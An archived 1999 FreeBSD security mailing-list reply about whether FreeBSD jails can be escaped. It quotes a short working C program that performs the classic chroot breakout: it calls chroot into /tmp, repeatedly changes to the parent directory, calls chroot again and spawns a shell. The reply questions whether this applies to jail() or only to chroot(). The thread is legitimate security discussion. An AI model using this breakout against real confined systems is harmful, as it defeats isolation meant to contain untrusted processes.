Date: Sat, 25 Sep 1999 15:38:29 +0200 From: Harold Gutch <logix@foobar.franken.de> To: Alexander Bezroutchko <abb@zenon.net>, freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG Subject: Re: about jail Message-ID: <19990925153829.B14097@foobar.franken.de> In-Reply-To: <19990925171712.A80535@zenon.net>; from Alexander Bezroutchko on Sat, Sep 25, 1999 at 05:17:12PM %2B0400 References: <199909251302.RAA58030@grendel.sovlink.ru> <19990925171712.A80535@zenon.net>
next in thread | previous in thread | raw e-mail | index | archive | help
On Sat, Sep 25, 1999 at 05:17:12PM +0400, Alexander Bezroutchko wrote: > * it is possible to escape from jail > Following program escapes from jail (tested under 4.0-19990918-CURRENT): > > /* --- start of example ------------------------- */ > #include <unistd.h> > #include <assert.h> > > const char *shell = "/bin/sh"; > const char *lowerdir = "/tmp"; > > int main() { > int i; > > assert(chdir("/") != -1); > assert(chroot(lowerdir) != -1); > for (i = 0; i < 32; i++) > assert(chdir("..") != -1); > assert(chroot(".") != -1); > > assert(execl(shell, shell, NULL) != -1); > }; > /* --- end of example --------------------------- */ > I don't run -CURRENT, so I can't test this - but this is the standard chroot()-breakout, and you're saying that using it you can break out of a _jail_ aswell ? Or are you simply mixing up jail() and chroot() ? bye, Harold -- <Shabby> Sleep is an abstinence syndrome wich occurs due to lack of caffein. Wed Mar 4 04:53:33 CET 1998 #unix, ircnet To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-hackers" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?19990925153829.B14097>